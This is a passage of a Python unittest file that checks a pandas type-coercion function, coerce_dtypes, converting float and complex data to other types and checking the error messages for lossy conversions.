out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceFloatDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
random.seed(12345)
size = 3 # minimum 3
cls.whole_floats = [-1 * size // 2 + i + 1.0 for i in range(size)]
# whole_flats = [..., -1.0, 0.0, 1.0, ...]
cls.decimal_floats = [-1 * size // 2 + i + 1 + random.random()
for i in range(size)]
# decimal_floats = [..., -1.0 + e, 0.0 + e, 1.0 + e, ...]
cls.decimal_floats_between_0_and_1 = [random.random()
for _ in range(size)]
# decimal_floats_between_0_and_1 = [0.xxxx, 0.xxxx, 0.xxxx, ...]
cls.bool_flags = [(i + 1.0) % 2 for i in range(size)]
# bool_flags = [1.0, 0.0, 1.0, 0.0, 1.0, ...]
cls.col_name = "floats"
def test_coerce_from_whole_float_to_integer_no_na(self):
in_data = self.whole_floats
out_data = [int(f) for f in self.whole_floats]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_whole_float_to_integer_with_na(self):
in_data = self.whole_floats + [None]
out_data = [int(f) for f in self.whole_floats] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_decimal_float_to_integer_no_na(self):
in_data = self.decimal_floats
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_decimal_float_to_integer_with_na(self):
in_data = self.decimal_floats + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_float_to_float_no_na(self):
in_data = self.decimal_floats
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_float_with_na(self):
in_data = self.decimal_floats + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_complex_no_na(self):
in_data = self.decimal_floats
out_data = [complex(f, 0) for f in self.decimal_floats]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_complex_with_na(self):
in_data = self.decimal_floats + [None]
out_data = [complex(f, 0) for f in self.decimal_floats] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_string_no_na(self):
in_data = self.decimal_floats
out_data = [str(f) for f in self.decimal_floats]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_string_with_na(self):
in_data = self.decimal_floats + [None]
out_data = [str(f) for f in self.decimal_floats] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_generic_float_to_boolean_no_na(self):
in_data = self.decimal_floats
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_generic_float_to_boolean_with_na(self):
in_data = self.decimal_floats + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_float_bool_flag_to_boolean_no_na(self):
in_data = self.bool_flags
out_data = [bool(f) for f in self.bool_flags]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_float_bool_flag_to_boolean_with_na(self):
in_data = self.bool_flags + [None]
out_data = [bool(f) for f in self.bool_flags] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_decimal_float_between_0_and_1_to_boolean_no_na(self):
in_data = self.decimal_floats_between_0_and_1
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_decimal_float_between_0_and_1_to_boolean_with_na(self):
in_data = self.decimal_floats_between_0_and_1 + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_float_to_datetime_no_na(self):
in_data = self.decimal_floats
out_data = [datetime.fromtimestamp(f, tz=timezone.utc)
for f in self.decimal_floats]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_datetime_with_na(self):
in_data = self.decimal_floats + [None]
out_data = [datetime.fromtimestamp(f, tz=timezone.utc)
for f in self.decimal_floats] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_timedelta_no_na(self):
in_data = self.decimal_floats
out_data = [timedelta(seconds=f) for f in self.decimal_floats]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_timedelta_with_na(self):
in_data = self.decimal_floats + [None]
out_data = [timedelta(seconds=f) for f in self.decimal_floats] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_object_no_na(self):
in_series = pd.Series(self.decimal_floats)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_float_to_object_with_na(self):
in_series = pd.Series(self.decimal_floats + [None])
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceComplexDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
random.seed(12345)
size = 3
cls.real_whole_complex = [complex(-1 * size // 2 + i + 1.0, 0)
for i in range(size)]
# ^ = [..., complex(-1, 0), complex(0, 0), complex(1, 0), ...]
cls.real_complex = [complex(-1 * size // 2 + i + 1 + random.random(), 0)
for i in range(size)]
# ^ = [..., complex(-1+e, 0), complex(0+e, 0), complex(1+e, 0), ...]
cls.real_complex_between_0_and_1 = [complex(random.random(), 0)
for _ in range(size)]
# ^ = [complex(0.xxxx, 0), complex(0.xxxx, 0), complex(0.xxxx, 0), ...]
cls.imag_complex = [complex(-1 * size // 2 + i + 1 + random.random(),
-1 * size // 2 + i + 1 + random.random())
for i in range(size)]
# ^ = [..., complex(-1+e,-1+e), complex(0+e,0+e), complex(1+e,1+e), ...]
cls.bool_flags = [complex((i + 1) % 2, 0) for i in range(size)]
# ^ = [complex(1, 0), complex(0, 0), complex(1, 0), complex(0, 0), ...]
cls.col_name = "complex"
def test_coerce_from_real_whole_complex_to_integer_no_na(self):
in_data = self.real_whole_complex
out_data = [int(c.real) for c in self.real_whole_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_real_whole_complex_to_integer_with_na(self):
in_data = self.real_whole_complex + [None]
out_data = [int(c.real) for c in self.real_whole_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_real_decimal_complex_to_integer_no_na(self):
in_data = self.real_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_decimal_complex_to_integer_with_na(self):
in_data = self.real_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_integer_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_integer_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_float_no_na(self):
in_data = self.real_complex
out_data = [c.real for c in self.real_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_float_with_na(self):
in_data = self.real_complex + [None]
out_data = [c.real for c in self.real_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_imaginary_complex_to_float_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {float} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, float)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {float} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: float})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_float_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {float} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, float)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {float} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: float})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_complex_to_complex_no_na(self):
in_data = self.imag_complex
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_to_complex_with_na(self):
in_data = self.imag_complex + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_to_string_no_na(self):
in_data = self.imag_complex
out_data = [str(c) for c in self.imag_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_to_string_with_na(self):
in_data = self.imag_complex + [None]
out_data = [str(c) for c in self.imag_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_bool_flag_to_boolean_no_na(self):
in_data = self.bool_flags
out_data = [bool(c.real) for c in self.bool_flags]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_bool_flag_to_boolean_with_na(self):
in_data = self.bool_flags + [None]
out_data = [bool(c.real) for c in self.bool_flags] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_boolean_no_na(self):
in_data = self.real_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_boolean_with_na(self):
in_data = self.real_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_whole_complex_to_boolean_no_na(self):
in_data = self.real_whole_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_whole_complex_to_boolean_with_na(self):
in_data = self.real_whole_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_between_0_and_1_to_boolean_no_na(self):
in_data = self.real_complex_between_0_and_1
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_between_0_and_1_to_boolean_with_na(self):
in_data = self.real_complex_between_0_and_1 + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_boolean_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_boolean_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_datetime_no_na(self):
in_data = self.real_complex
out_data = [datetime.fromtimestamp(c.real, tz=timezone.utc)
for c in self.real_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_datetime_with_na(self):
in_data = self.real_complex + [None]
out_data = [datetime.fromtimestamp(c.real, tz=timezone.utc)
for c in self.real_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_imaginary_complex_to_datetime_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {datetime} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, datetime)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {datetime} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: datetime})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_datetime_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
